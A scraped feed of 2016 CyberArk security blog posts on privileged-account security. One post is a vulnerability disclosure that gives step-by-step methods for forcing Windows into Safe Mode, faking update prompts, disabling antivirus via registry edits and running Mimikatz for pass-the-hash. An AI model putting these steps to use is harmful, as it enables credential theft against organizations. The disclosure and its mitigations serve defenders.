Credentials—and, in particular, privileged credentials—give attackers the permissions necessary to access servers and steal data or go after the domain controllers and take control of the IT environment. They are the gateway to an organization’s most valuable assets and are the common denominator in the cyber attack life cycle. Securing privileged accounts and credentials must be at the top of the enterprise security agenda. In fact, it’s time to put privilege first.

With this in mind, we’ve highlighted five reasons to make privileged account security your first priority, and each is detailed in our new guide, which I encourage you to read.

5 top reasons to prioritize privileged account security:

  1. Privilege is the road most traveled.
  2. Privileged accounts represent the express lane to your domain controllers.
  3. Your security systems need to be secure.
  4. Single solution to protect against insider threats and external attackers
  5. Securing privileged accounts is the first action following an attack

Prioritizing privilege will put you on the fast-track to reducing your organization’s risk profile with measurable return on your investment.

]]>
Just Released: CyberArk Global Advanced Threat Landscape Survey 2016 https://www.cyberark.com/blog/just-released-cyberark-global-advanced-threat-landscape-survey-2016/ Wed, 21 Sep 2016 22:07:29 +0000 https://www.cyberark.com/blog//

Today we unveiled findings from our 10th annual Global Advanced Threat Landscape Survey. This year’s report, themed “Cyber Security: Past, Present & Future,” examines whether or not global enterprises have learned and applied lessons from high-profile cyber attacks, and explores factors that influence security priorities and business decision-making.

While the vast majority of respondents (82 percent) believe the IT security industry is making progress against cyber attacks, those gains are undercut by egregious security practices in critical areas such as privileged account security, third-party vendor access and cloud. With that theme in mind, our take on some of the key findings are below. We encourage you to read the full, free report for your own assessment of the findings.

Bad Security Habits Persist, Despite Rising Awareness. Seventy-nine percent of respondents state their organization has learned lessons from major cyber attacks. Yet many fail to enforce best practices or adequately prioritize security initiatives in the right areas to effectively protect against advanced threats—underscoring a wide gap between “awareness” and “preparedness.” For example, more than half of the respondents state they have evolved or changed processes for managing privileged accounts, yet 40 percent of organizations still store privileged and administrative passwords in a Word document or spreadsheet and 28 percent use a shared server or USB stick

The Risks of Overconfidence. Today, three out of four IT decision makers believe they can prevent attackers from breaking into their internal network—up from 44 percent in 2015. However, this [over]confidence is counter to the number of increasingly aggressive and damaging attacks reported. In fact, 46 percent of respondents believe their organization has been the victim of a ransomware attack in the last two years.

Future Risks and Prioritization Challenges. As cyber attacks continue on trusted institutions such as government, utilities and financial systems, when asked about emerging risks, respondents note they are most concerned with distributed denial-of-service (DDoS) attacks, phishing, ransomware, privileged account exploitation and perimeter breaches.

With threats against critical infrastructure, such as the much-publicized power outage in the Ukraine, no longer science fiction, respondents share their opinion on which scenarios present the most immediate and potentially catastrophic cyber security threat in general. The majority (58 percent) feel an attack on financial systems, including disruption of global stock markets, is the most threatening.

The findings of this year’s Global Advanced Threat Landscape Survey of 750 global IT & IT security decision makers demonstrate that cyber security awareness doesn’t always equate to being secure. Too often, organizations undermine their own efforts by failing to enforce well-known security best practices.

The majority of today’s breaches are a result of poor security hygiene. Organizations can’t lose sight of the broader security picture while trying to secure against the threat du jour. This means consistently executing on the fundamentals, from keeping security patches and software versions up-to-date, to implementing and enforcing least privilege access policies and using strong authentication as needed, and listening to auditors and consultants.

To learn more, download the Global Advanced Threat Landscape Survey 2016 at https://www.cyberark.com/resource/2016-global-advanced-threat-landscape-survey/.

]]>
CyberArk Labs: From Safe Mode to Domain Compromise https://www.cyberark.com/blog/cyberark-labs-from-safe-mode-to-domain-compromise/ Thu, 15 Sep 2016 19:11:38 +0000 https://www.cyberark.com/blog//

Overview

CyberArk Labs recently identified what it believes to be a significant risk related to Windows Safe Mode, which is built into all Windows Operating Systems (OS) on both PCs and servers. Once attackers break through the perimeter and gain local administrator privileges on an infected Windows-based machine, they can remotely activate Safe Mode to bypass and manipulate endpoint security measures. In Safe Mode, the attackers are able to freely run tools to harvest credentials and laterally move to connected systems – all while remaining undetected. This exploit can also work in Windows 10, despite the presence of the Microsoft’s Virtual Secure Module (VSM).

By exploiting these weaknesses, attackers can turn infected endpoints into launching points for pass-the-hash attacks, which can provide attackers with access to more machines on which they can re-use these same attack techniques to ultimately compromise the entire Windows environment.

 Introduction

Safe Mode is a long-standing, basic function of the Windows OS that was designed to provide a lean environment in which users can examine and resolve issues that cannot be resolved in Normal Mode. Safe Mode was first released in 1995 when “security” and “cyber” were still terms of science fiction. Back then, vendors were focused on system stability, efficiency and business operations – meaning security was usually neglected. Yet, as the Internet has become ubiquitous, such technologies have become tools of opportunity for cyber attackers.

Because Safe Mode was purposely designed to be lean, it restricts most third-party software, including security tools, from running. As a result, cyber attackers on compromised machines can remotely reboot those machines into Safe Mode to disable and evade endpoint defenses and subsequently launch their attacks. Given the number of Windows systems in use, this risk impacts billions of PCs and servers globally.

This blog will outline the privileged attack pathway that starts with Safe Mode, address how Safe Mode can be used to manipulate endpoint security measures, and suggest steps your organization should take right now to mitigate this risk.

Description of Risk

It’s fairly easy for attackers to break through the perimeter and gain access to at least one machine on a corporate network. In fact, in a recent report by FireEye, 84 percent of organizations surveyed admitted to falling victim to at least one spear-phishing attack in 2015 (1). Once the attacker has access to a machine, the attacker will attempt to gain local administrator rights either by leveraging the user’s existing privileges or by using an exploit to elevate to these privileges.

Once attackers have remote, local administrator access to infected machines, they need to evade a variety of endpoint security measures such as anti-virus and endpoint threat detection tools. Next, to maximize their success, attackers typically scour endpoints looking for credentials that can be reused to laterally move throughout the network. With this in mind, several tools, including Microsoft’s recently released Virtual Secure Module (VSM), have been created to operate at the endpoint level to limit the use of attack tools and protect credentials from pass-the-hash attacks. These tools can be highly effective, but the catch is, they are typically designed to operate only in Normal Mode.

Enter, Safe Mode. Safe Mode, by design, does not boot any software or drivers that are not critical to the operation of Windows. As a result, by remotely forcing a reboot in Safe Mode, attackers inside a compromised system are able to operate freely, as most endpoint defenses are not enabled. And because VSM is only enabled in Normal Mode, attackers can also capture credential hashes needed to laterally move through the environment – despite Microsoft’s claims that pass-the-hash risks have been mitigated (2).

Exploiting Safe Mode to Escalate an Attack

This example explains how Safe Mode can be exploited to allow an attacker to capture user credentials and execute pass-the-hash attacks to achieve lateral movement. This pattern of credential capture and lateral movement can be reused by an attacker multiple times until an eventual domain compromise in achieved.

To successfully exploit this weakness in Safe Mode, attackers must complete three steps:

  1. Change system settings to move the OS into Safe Mode during the next reboot
  2. Configure attack tools to load in Safe Mode
  3. Force the reboot of the machine to begin the exploit

This process is actually much easier than it sounds, and it can typically be done without the user noticing that anything has gone wrong. The steps below show just how simple this entire process can be.

Step 1: Remotely configure a machine to boot in Safe Mode

To remotely force a Windows-based machine into Safe Mode during the next reboot, attackers can use BCDEdit to configure the system to boot in Minimal Safe Mode. Once this change is made, the machine will – by default – boot in Minimal Safe Mode, which is the default Safe Mode boot option that runs only the minimal drivers and services needed to start Windows and prevents connections to the Internet and network.

Step 2: Configure attack tools to load in Safe Mode

 Remember that, by design, Safe Mode loads only a minimal set of drivers and tools. To gain a presence in Safe Mode, the attacker must somehow enable his or her attack tools to run in this lean state. This can be done in a few ways, two of which include:

  • Malicious Service. Attackers can create a malicious service that is configured to load in Safe Mode. The service can be included in the attacker’s initial payload.
  • Malicious COM Object. Attackers can register a malicious COM object that is loaded by explorer.exe. This enables that attacker’s code to run each time the explorer.exe needs to parse icons. (Yes, surprisingly this works in Safe Mode, as well.)

With these tools in place, the attacker’s malicious code will automatically run during the next reboot.

Since most endpoint security solutions are not effective in Minimal Safe Mode, these attack tools can easily evade endpoint security measures. In this state, the attacker is able to freely use his or her tools to steal credentials from LSASS.exe and then reuse those credentials to continue the attack path of lateral movement and privilege escalation.

Step 3: Restart the machine to execute the next phase of the attack

This can easily be done in a variety of ways, including directly from the command line in Normal Mode.

But wait! How does the attacker do this without the victim noticing?  Sure, the attacker can arbitrarily force a restart, but this will likely look suspicious to the user and prompt a phone call to the IT team. Instead, to stay under the radar, the attacker can also either wait until the next restart or show the victim an “update” window with a message that says the PC must be rebooted. This “update” window can purposely be designed to look like a legitimate Windows pop-up.

Next, depending on the attacker’s goal, there are a few techniques an attacker can use to continue to stay hidden from the victim. Let’s look at the techniques based on the attacker’s goal:

  • Credential Theft. If the attacker’s goal is to steal credentials for future use, then the attacker actually wants the user to log on to the system. As the user logs in, the attacker can capture the credentials. In this case, the attacker will likely use the COM object technique to execute code that will change the background, look and feel of Safe Mode – making it appear that the user is still in Normal Mode. As soon as the user enters his or her credentials, a second “update” window can prompt the user to reboot yet again to move the machine back into the actual Normal Mode. Just as mentioned above, this secondary reboot prompt can mimic a legitimate Windows prompt to prevent the user from noticing anything suspicious.
  • Lateral Movement. If the attacker’s goal is to perform a pass-the-hash attack using previously compromised credentials, then the attacker does not need the user to login. In this case, the attacker is better off creating a service. At the time of reboot, the service can automatically run code to execute a pass-the-hash attack and then immediately reboot the machine again back into Normal Mode. These back-to-back restarts are indistinguishable to the user, and thus further prevent the user from noticing that something went wrong. Based on tests conducted by CyberArk Labs, we found this technique to be highly effective in stealthily enabling lateral movement.

What about Event Log? Someone can definitely see that a PC went to Safe Mode. That is correct, but at this point I’ll encourage you read to research by my colleague, Roi Cohen, “Can Incident Response and Audit Teams Always Trust Windows Security Event Logs?

Exploiting Safe Mode to Manipulate Security Measures

The next example will show how attackers can not only avoid endpoint security defenses in Safe Mode but also manipulate these solutions within Safe Mode. This example was tested against McAfee LiveSafe, Avira Free Antivirus, Trend Micro Maximum Security 10 and Windows Defender.

All of these solutions run in Normal Mode and some can run in Network Safe Mode, which is a Safe Mode boot option that boots the minimal drivers and services need to start Windows, as well as the drivers and services needed connect to the Internet and network. However, none of these solutions runs in Minimal Safe Mode. As such, registry keys associated with these solutions cannot be modified in Normal Mode or Network Safe Mode, but they can be modified in Minimal Safe Mode.

Once an attacker has booted a machine into Minimal Safe Mode, the attacker can access registry keys and alter configurations to disable or manipulate endpoint security solutions. Once that’s complete, an attacker can reboot the machine back into Normal Mode and freely proceed with the attack without the risk of being blocked by an endpoint security solution.

When testing this in our lab, we attempted to use Mimikatz in Normal Mode to steal credentials from memory. When endpoint security solutions were properly configured, Mimikatz was removed each time we attempted to use it – including when we attempted to copy it to the disk. After we modified the registry keys in Minimal Safe Mode, we were able to seamlessly run Mimikatz, write the tool to the disk, and successfully capture credentials without setting off any alarms.

Mitigation

Though this risk is built in to all Windows OSes, there are a few proactive steps organizations can take to mitigate this risk. Recommendations include the following:

  • Enforce the principle of least privilege. The ability to remotely load a machine into Safe Mode from Normal Mode is only present when an attacker is able to operate with local administrator privileges. By removing local administrator privileges from standard users, organizations can reduce their exposure to this type of exploit.
  • Rotate privileged account credentials. To successfully execute a pass-the-hash attack, the compromised credential hash must still be valid. By proactively rotating privileged account credentials, organizations can frequently and automatically invalidate password hashes that may exist on machines throughout the environment. As a result, attackers can still capture the password hashes from compromised machines, but the hashes will be useless.
  • Employ security tools that operate in Safe Mode. Security tools that only function properly in Normal Mode can leave organizations exposed to this type of attack. When evaluating endpoint security tools, ensure that the solution you select is able to function in Safe Mode.
  • Monitor the use of Safe Mode. This can be done both proactively and after the fact. Set alerts to know when a machine boots in Safe Mode, and monitor the Windows Event Log to search for this type of event. Note, however, that recent research indicates that the Windows Event Log may not be entirely trusted.

 Disclosure Timeline

  • February 24, 2016: Initial discovery by CyberArk Labs
  • May 2, 2016: Risk reported to Microsoft Security Response Center
  • May 2, 2016: Microsoft responded that they did not consider the submission a valid vulnerability as it requires an attacker to have already compromised the machine.*
  • September 15, 2016: Public disclosure

 *According to Microsoft’s “Ten Immutable Laws of Security

https://www2.fireeye.com/rs/fireye/images/fireeye-how-stop-spearphishing.pdf

2 https://www.blackhat.com/docs/us-15/materials/us-15-Moore-Defeating%20Pass-the-Hash-Separation-Of-Powers.pdf

 

]]>
Supply Chain Risk Management Standards to be Developed as Part of NERC’s Critical Infrastructure Protection Security Mission https://www.cyberark.com/blog/supply-chain-risk-management-standards-developed-part-nercs-critical-infrastructure-protection-security-mission/ Tue, 13 Sep 2016 17:05:18 +0000 https://www.cyberark.com/blog//

On July 21, 2016 the Federal Energy Regulatory Commission (FERC) directed the North American Electric Regulatory Commission (NERC) to develop a new supply chain risk management standard that addresses risks to information systems and related bulk electric system assets. The standard will cover a variety of issues including software integrity and authenticity, remote vendor access, vendor risk management and procurement controls.

In parallel the FERC also issued a Notice of Inquiry (NOI) to gather the public’s input on the protection of control centers used to monitor and control the bulk electric system in real-time, with particular interest in remote vendor access and application whitelisting. In this NOI, the FERC referred to the December 2015 attack on the Ukraine electric grid as an example of the need to update the current Critical Infrastructure Protection (CIP) standards.

These initiatives have a common interest in securing the communications that connect the electric utilities’ control centers to the outside world. This is an important step in mitigating future attacks on the Industrial Control Systems (ICS) that monitor and control equipment responsible for generating and transmitting power in North America. The efforts to continue to develop the CIP standards, and welcoming the industry’s expertise will help organizations to reduce the ICS attack surface by better managing the security of remote vendors and supply chain in general. To learn more about how CyberArk addresses the NERC CIP standards and requirements, read our white paper: Protecting the Grid: Addressing NERC CIP Requirements for Securing Privileged Accounts.

In June 2016, CyberArk introduced new cyber security capabilities for ICS to limit the progression of malware, better identify privileged account-related risks, and improve remote access security in industrial environments. We will share our perspective on the best practices organizations should follow to shore up security gaps in their supply chain and to secure access to sensitive assets. We plan to formally submit comments to the FERC on this NOI, and we encourage other industry experts to support the initiative.

]]>
Tune In To Our Webcast Series: On the Front Lines https://www.cyberark.com/blog/tune-webcast-series-front-lines/ Thu, 01 Sep 2016 19:39:09 +0000 https://www.cyberark.com/blog//

We recently kicked off a new webcast series, On the Front Lines. Led by our team of system engineer experts, these webcasts take place on Tuesdays at 2:00 p.m. EDT offering information on cyber security trends, technical details on security exploits involving privileged accounts and actionable insights on improving privileged access controls.

Over the past few weeks, we’ve examined the exploitation of privileged accounts in today’s most damaging advanced attacks; discussed how privilege management plays a critical role in preventing credential theft and lateral movement; explored an innovative new approach to combating ransomware; and outlined steps for jump-starting a privileged account security program.

Here’s a quick look at our upcoming sessions for September:

September 13: Detect & Respond to Attacks on Domain Controllers: An End-to-End Look at Kerberos Attacks

Attackers frequently target Domain Controllers to ultimately gain carte blanche access to an entire organization. Once an attacker has access to a domain administrator credential, they can generate Kerberos tickets to achieve unauthorized, undetected, and often, unfettered access to the enterprise environment. Led by Len Noe, this session will feature a live demonstration of a Golden Ticket attack as well as a discussion around Domain Controller security—including proactive protection, detection and response to attacks that target Domain Controllers. You can register for this webcast here.

September 20: Find Your Privileged Account Security Risks via a Discovery & Audit Exercise

Most organizations have 3-4 times more privileged accounts than employees, but where do these privileged accounts exist? Attackers can easily locate your high value users (Domain Admins) and high value assets (Domain Controllers)—can you? Do you understand how to secure them? Join this session with Kevin Ross to learn how CyberArk’s Discovery and Audit tool finds vulnerable privileged credentials, including passwords and SSH keys, and makes suggestions for securing your privileged account environment. You can register for this webcast here.

September 27: CyberArk and Multi-factor Authentication

Multi-factor authentication is an important security control for critical systems. Evan Litwak will discuss how CyberArk integrates with common multi-factor vendors to add additional protection to the heart of the enterprise. This session will also cover ways to extend multi-factor authentication to legacy systems. You can register for this webcast here.

As you work to protect your organization’s most valuable assets, know that you’re not alone. We’re on the front lines offering security insights and solutions that can help you to mitigate risks.

]]>
A Phased Approach for Implementing Privileged Account Security Programs https://www.cyberark.com/blog/phased-approach-implementing-privileged-account-security-programs/ Fri, 26 Aug 2016 17:50:42 +0000 https://www.cyberark.com/blog//

Privileged accounts represent a significant attack vector that organizations have to address as part of a proactive cyber security program. With tens or hundreds of thousands of privileged accounts across a typical enterprise organization, IT security teams have to consider a number of factors as they improve privileged access controls – including complexity, legacy access and the unknown impact of change.

Though some CISOs set a goal from the start of deploying a comprehensive privileged account security program, many others take a phased, step-by-step approach based on an enterprise-wide, long-term strategy. To start, they often identify a small set of accounts using classification and risk-rating mechanisms to pinpoint the highest risk. These accounts are moved to a centralized and automated system. Then gradually, over time, the organization expands coverage to new phases.

The way an organization defines each “phase” will differ from company to company, but following are some examples of typical phases:

  • By platform/technology: Organizations can create phases for administrative accounts in Windows, Linux, mainframes, databases and so on. In some cases, they address all of the machines on a particular platform first, then another platform, for example, addressing all Unix servers and then all Windows servers, can help to reduce the risk of intruders being able to move laterally between machines.
  • By region or by business unit: This approach is often used by global organizations in which each region has its own IT group and infrastructure. Similarly, if a company has separate IT groups for each business unit, it may choose to address each one as a phase.
  • By application team: If an organization has multiple application development teams, it may choose to work with each team in phases.

When determining which phased approach will work best for your organization, consider what would cause the least disruption while adding the most value. After you have success in one phase or area, you are in a position to scale up the program. Look for ways to standardize your approach across the organization. For instance, if a pilot project has applied a new approach to managing Unix accounts, use that process and strategy as a blueprint for managing accounts in other platforms.

As one CISO noted in the CyberArk-sponsored CISO View report, “Don’t bite off too much initially. Phase it in, manage the effort piece-by-piece in an incremental approach. Use a scoreboard to track your progress as things move into your privileged ID process so you can see month over month what it looks like as you continue to drive the advancement.”

In this short video, I share the three primary phases our customer success team often recommends for improving privileged account security using the CyberArk Privileged Account Security Solution. To learn more, please visit here.

]]>
Another Breach, Another Reminder: Cyber Hygiene Isn’t Optional https://www.cyberark.com/blog/another-breach-another-reminder-cyber-hygiene-isnt-optional/ Wed, 24 Aug 2016 15:23:11 +0000 https://www.cyberark.com/blog//

Last year Katherine Archuleta, director of the federal Office of Personnel Management, resigned in the wake of a breach exposing personal information of an estimated 20 million people, and in July 2016 Democratic National Committee Chairwoman Rep. Debbie Wasserman Schultz resigned following the leak of internal e-mails. In the private sector, cyber security failures have cost many executive leaders their jobs. They are not alone as noted in this CSO article that explores the fates of other executives post breach. A high-profile data breach can be a career-ending event for those in charge.

Organizations invest in cyber security technology, but too often they do not follow through with basic cyber security hygiene to address known or likely risks. More than a year after the OPM breach became public, a Government Accountability Office report concluded that the agency still needed to improve controls on critical information systems. The most recent Data Breach Investigations Report from Verizon found that the top 10 known vulnerabilities accounted for 85 percent of successful exploits studied. In the case of the DNC breach, numerous reports suggest that committee officials failed to heed advice from consultants to improve network security.

These breaches happen because leaders fail to prioritize cyber security and truly make it a part of organizational culture.

Pay attention to the basics

Very often it is small things left undone that facilitate breaches. Organizations invest in a variety of tools to help protect, monitor and analyze activity on networks. But you can’t forget to execute on the fundamentals. If you do, you leave a crack open for an attacker to enter.

Fundamentals include keeping security patches and software versions up-to-date, implementing and enforcing least-privilege access policies, using strong authentication as needed, and listening to auditors and consultants. Merely storing log data is not good security. Analyzing the data to identify and halt threats is better. If auditors identify security shortfalls, address them. Otherwise, your organization is exposed.

Institutionalizing security within your organization will add value to your investments in technology and the human resources. This is easier said than done, of course. Seemingly simple chores such as patching and updating software can be time-consuming and resource-intensive because of the need to thoroughly test changes. Effective policies require careful planning and broad buy-in from executives and others. Getting the resources needed to do the basics takes commitment at the highest levels of your organization.

Making the business case for cyber security

It is easy to appreciate the value of cyber security in the wake of an incident. It is much more valuable to make the business case for proactive cyber security. Here are a few points decision makers in your organization should keep in mind:

  • Your organization is a target. Your systems contain sensitive information about your plans and activities, and about your customers, employees and partners. You are part of an extensive business chain that includes suppliers and customers, and even one weakness in this complex system can be exploited.
  • Breaches have consequences. They are not merely an inconvenience. Victims incur direct expenses of detecting and responding to incidents and repairing damage, as well as the costs of downtime, damage to brand reputation and the threat to the jobs of those held accountable.
  • Cyber security is a full-time concern. Protecting your information resources is not a project, a one-time expense or a check-off for regulatory compliance. It is an oangoing program that requires continuous attention not only of the IT and security staff, but also of decision-makers and C-level executives.

The stakes for cyber security are high and the competition is tough. A winning hand must include not only the right technology, but also a commitment to keeping your organization and its resources secure.

]]>
Passwords Don’t Have to Be the “Enemy of Security” https://www.cyberark.com/blog/passwords-dont-enemy-security/ Thu, 18 Aug 2016 17:58:04 +0000 https://www.cyberark.com/blog//

The headline of an Ars Technica article on password rotation recently caught my attention, “Frequent Password Changes are the Enemy of Security.” The article, which highlights a BSides Las Vegas keynote by FTC Chief Technologist Lorrie Cranor, explains that contrary to what we’ve been told for years, frequent password changes can be counterproductive.

Citing research from both University of North Carolina at Chapel Hill and Carleton University, Cranor noted that people who are compelled to change their passwords regularly – typically every 90 days – tend to simply update their old password in a very small way, like adding quotation marks or an exclamation point at the end. This practice, called “transformation,” results in passwords that are very easily cracked by attackers. In short, she argues that such password changes are a waste of the employees’ time and the changes do not make an organization more secure.

She’s right – frequent password changes executed by individual users are often exercises in futility for the reasons noted above, but that doesn’t mean that passwords shouldn’t be rotated. It means that organizations must get smarter about how the process is managed – this is particularly important when it comes to privileged accounts that provide access to sensitive data and critical systems. Without controls in place to proactively secure and manage these privileged accounts and credentials, organizations can face an increased risk of data breaches, insider threats, irreparable system damage, failed audits and fines.

Instead of leaving the management of privileged passwords with IT administrators, organizations should consider a privileged account security solution that can automate the process – discovering, securing, rotating and controlling access to privileged account passwords used to access systems across their enterprise IT environment.

Consider this example, a global financial services provider with nearly 60,000 employees worldwide wanted to remove the physical labor of managing highly privileged passwords manually, while simultaneously augmenting its operational efficiency. They deployed the CyberArk Enterprise Password Vault. Not only did this eliminate a window of opportunity for passwords to be compromised – by accident or otherwise – and it also helped the bank to meet stricter audit requirements. Furthermore, the company can now enforce an enterprise-wide policy, managing the entire lifecycle of shared and privileged accounts across the business. To learn more about CyberArk customer deployments, refer to the case studies available on our website.

Returning to the headline that caught my eye, let’s add four critical words to the end:  “Frequent Password Changes are the Enemy of Security Without Proper Password Management.”

]]>
What’s Your Privileged Account Attack Surface? https://www.cyberark.com/blog/whats-privileged-account-attack-surface/ Mon, 15 Aug 2016 19:25:35 +0000 https://www.cyberark.com/blog//

Discovery is the first step to establish effective privileged account security. In our experience and research, organizations typically have at least 3 to 4 times more privileged accounts than employees. This data point gives organizations an idea of what to expect in terms of scope of the project, but each environment is different and the actual numbers vary and can be significantly more.  To help organizations discover how many privileged accounts they have and where they exist, CyberArk offers a free Discovery & Audit tool. With this risk assessment tool, organizations gain visibility into privileged account vulnerabilities across the IT network.

CyberArk Discovery & Audit is a powerful risk assessment tool that discovers:

  • Passwords – Old and static passwords introduce significant risk of compromised credentials. CyberArk Discovery & Audit identifies all privileged account credentials including hard-coded credentials, for example, in IIS, Websphere, and Weblogic.
  • Password hashes – Passwords are frequently hashed and stored on local machines for user convenience by the operating system, but attacks such as Pass-the-Hash leverage these vulnerable password hashes in order to execute a credential theft attack, impersonate employees, and access valuable assets and data. CyberArk Discovery & Audit illustrates which machines store privileged passwords and how an attacker can execute a Pass-the-Hash and Golden Ticket attack.
  • SSH keys – Stored throughout a network, SSH keys pose a major challenge to security teams because these privileged credentials can be easily created without a record, and they are difficult to track, manage or control. CyberArk Discovery & Audit identifies SSH keys (including orphan SSH keys) and illustrates trust relationships that enable access to privileged accounts.
  • Unix security risks – Organizations frequently use sudo (superuser do) to enforce least privilege policies, yet they don’t realize that many sudoer files unknowingly contain misconfigurations that enable privileged users to work around sudo in order to escalate their privileges. It’s particularly critical to protect Unix environments because they often host an organization’s most sensitive data. CyberArk Discovery & Audit discovers potential misconfigurations that could allow users to elevate privileges in Unix without authorization.

An organization’s privileged account attack surface is typically massive as it includes every piece of hardware and software in the enterprise including routers, firewalls, databases, servers, applications, endpoints, etc. With potential vulnerabilities hiding in every corner of the IT infrastructure, it’s vital to gain visibility of the attack surface. A good start is to find and identify privileged accounts across the organization – which is exactly what CyberArk Discovery and Audit is designed to do.

With knowledge of how many privileged accounts exist, and the status of each privileged credential, organizations can begin a privileged account security program by securing the highest risk accounts with a centralized solution. As organizations implement security controls, they can measure progress with metrics on privileged account security health. These milestones help to justify privileged account security programs by proving tangible ROI measures, which are also an effective way to engage with stakeholders.  We encourage you to learn more about this valuable tool.

 

 

 

]]>
Securing EC2 instances using Ansible and Conjur https://www.cyberark.com/blog/securing-ec2-instances-using-ansible-and-conjur/ Thu, 11 Aug 2016 19:09:00 +0000 https://cyberarkvx2.wpengine.com/blog/securing-ec2-instances-using-ansible-and-conjur/  

Ansible provides powerful orchestration capabilities to launch and manage machines in the cloud. Conjur provides advanced identity management and access control capabilities to help secure that infrastructure.This is the first in a series of articles in which we explore best practices for using them together, combining Ansible’s legendary ease of use with the visibility and control provided by Conjur’s declarative security, public key management, granular authorization and detailed audit logging.

In the modern IT environment, code and machines provision and access other code and machines, and therefore need the same privileged access that used to belong only to people. Conjur integrates with, and complements Ansible and Ansible Tower security to control and audit access between the thousands of interconnected microservices, machines, and people that compose your digital business infrastructure. It also distributes that control to your cloud edge, across data centers and remote/mobile infrastructure for fast, non-stop protection.

In this article, we show how to automate the process of:

  1. Launching a new EC2 instance on AWS
  2. Defining an identity and access policy for the new EC2 instance in Conjur
  3. Associating the identity and access policy with the new instance
  4. Configuring the instance for SSH access
  5. Auditing access to the instance

Launching instances

Launching an EC2 instance with Ansible and Conjur starts in exactly the way you’d expect. Our sample playbook, below and in Github, follows common patterns found in other Ansible EC2 examples:

Ansible-Cookbook-EC2-Instance-Github.png

  • The playbook creates and manages its own security group called EE_Demos_Ansible. This operation is idempotent; the security group will be updated if it already exists, so it’s safe to run the playbook repeatedly.
  • The instance is tagged with a distinct EC2 tag indicating the application name. The Ansible ec2 action is instructed to launch exactly one instance with this tag, so the playbook is also idempotent with respect to the instance.
  • The add_host action is used to add the host to the Ansible in-memory “inventory” (the list of hosts and host groups that the playbook knows about).
  • The wait_for action is used to wait for the SSH port 22 to become available. Ansible needs this to do anything else, because it uses SSH to connect to machines and configure them.

Once the EC2 instance is up, we configure it for Conjur security. In this example, the instance runs a sample application called “frontend.” A declarative policy (below or in Github) which defines a Conjur “layer” for an application called “frontend” looks like this in YAML code:

Access-Policy-Secure-EC2-Instance-Conjur.png

The policy is loaded into Conjur like this:

$ conjur policy load --as-group ops frontend.yml

Then the policy can be inspected in the Conjur user interface:

Policy inventory:

Ansible-EC2-Creation-Access-Policy-Conjur.png

Policy role graph:
Ansible-EC2-Instance-Role-Graph-Conjur.png

Enrolling the new instance into Conjur

Once the instance is launched it needs to be enrolled, the process by which the instance obtains a unique Conjur identity and a set of roles (provided by membership in layers).

Conjur has a Host Factory facility for this purpose. Each Host Factory manages a set of cryptographic tokens (opaque, time-limited secrets). When the instance presents a valid token to the Host Factory it creates a new host identity which it communicates to the instance, and adds the host to the appropriate layers.

Ansible can provide Host Factory tokens to new instances as part of its workflow. Once Ansible has launched an instance, it obtains a Host Factory token from Conjur and passes it to the /opt/conjurize script on the instance, which in turn contacts the Host Factory on the Conjur server using the token.

Configuring the instance for SSH access

Once the instance has its identity, the “conjurize” script proceeds to configure the host for Conjur SSH access management (the installer for which is free software available in GitHub)

Conjur SSH provides SSH authentication via public keys and SSH authorization via PAM + Conjur LDAP, in addition to the following features:

  • Each user has their own private key.
  • This private key is used to SSH to EC2 instances using the standard SSH tool chain (ssh/putty client and openssh server).
  • Users are uniquely authenticated by private and public key, with the public key provided by the Conjur pubkeys service.
  • Users are then uniquely authorized to the host according to the Conjur role-based access control model, as defined by policies loaded into Conjur.
  • Users do not login to the host as the “root” user or any other shared account (e.g. “ec2-user” or “ubuntu”). This is wonderful from an audit and compliance standpoint.
  • All login, logout, and sudo activity on the instance is recorded by the Conjur audit database, which is compatible with external auditing services such as Splunk.

 

Enrolling and rotating the host “break glass” SSH key

In the case that a machine becomes accidentally misconfigured, certain highly privileged personnel can be given a “break glass” SSH key to log in and regain control of the machine. This is a shared login, so Conjur makes this “last resort” credential secure by managing a unique SSH key for each machine which is rotated regularly and on-demand.

Once Ansible has finished launching the instance and conjurizing it, it runs a local play using Conjur to create and install the instance’s unique “break glass” key. Conjur writes the public key to the authorized_keys file on the machine, and Ansible stores the private key in a Conjur variable accessible only to defined set of authorized security personnel.

In order to maintain least privilege and prevent itself from becoming a backdoor, Ansible revokes its own access to the “break glass” key once it’s been created.

The Power of Ansible and Conjur together

The full power of Ansible automation can be combined with Conjur security and access management capabilities to create deployment environments which are both highly automated, and highly advanced from a privileged access management standpoint.

 

]]>
Building Privileged Account Security into the Cloud https://www.cyberark.com/blog/building-privileged-account-security-cloud/ Mon, 08 Aug 2016 15:51:44 +0000 https://www.cyberark.com/blog//

In our regular conversations with customers and others, many tell us their organization is on a “journey to the cloud.” Inevitably, the discussion turns towards privileged accounts in cloud environments and how to secure them.  We have solid advice and answers for them – the CyberArk Privileged Account Security solution secures privileged accounts in applications, servers and management consoles in cloud environments in much the same way it works to secure privileged accounts located on-premises. Our solution is designed to support privileged accounts regardless of where they reside.  However, in cloud environments, there is more.

In order to maximize the benefits and flexibility of the cloud (and speed the process of migrating workloads to the cloud), many organizations engage the help of cloud orchestration and automation tools such as Chef and Puppet. These tools deliver efficiency when migrating to and managing cloud environments, allowing organizations to quickly move and deploy new instances and applications. It is this automation in cloud environments that provides an opportunity to employ “advanced” privileged account security methods and policies.

What do we mean by “advanced”?

Used with these tools, CyberArk can automate the process of securing privileged accounts in addition to securing the orchestration tools themselves.  Here are some use cases that demonstrate the use of Puppet:

  1. Automate the deployment of a new MySQL Server in AWS and seamlessly provision the newly created admin account directly to the CyberArk Digital Vault at the time of creation. We refer to this as Privileged Account Security “built into” the cloud environment.
  2. Secure the privileged accounts required by Puppet (ex. AWS console credential) in the CyberArk Digital Vault and enable Puppet to securely retrieve these credentials on-demand
  3. Automatically provision the agent required for secure application-to-application authentication to a new server at the same time it is created – for use when applications are developed on the server

These use cases not only improve efficiency and conserve resources, they also demonstrate improved security because the securing of privileged accounts occurs at the time of inception, rather than after a delay due to the timing of a scanning or discovery process. It’s this integration of Privileged Account Security with automation that delivers security aligned with the flexibility and convenience of the cloud.

Learn more about protecting privileged accounts in cloud environments here.

]]>
New Network and Information Security Directive Aims to Mitigate Risks of a Cyber Attack on Critical Infrastructure https://www.cyberark.com/blog/new-network-information-security-directive-aims-mitigate-risks-cyber-attack-critical-infrastructure/ Thu, 04 Aug 2016 14:35:36 +0000 https://www.cyberark.com/blog//

As security incidents increase in frequency and impact, the European Union (EU) Council has approved the Network and Information Security (NIS) directive. This mandate is designed to help member states mitigate the risks of a cyber security incident, and it represents the first legislative framework to cover the interconnected European critical infrastructure.

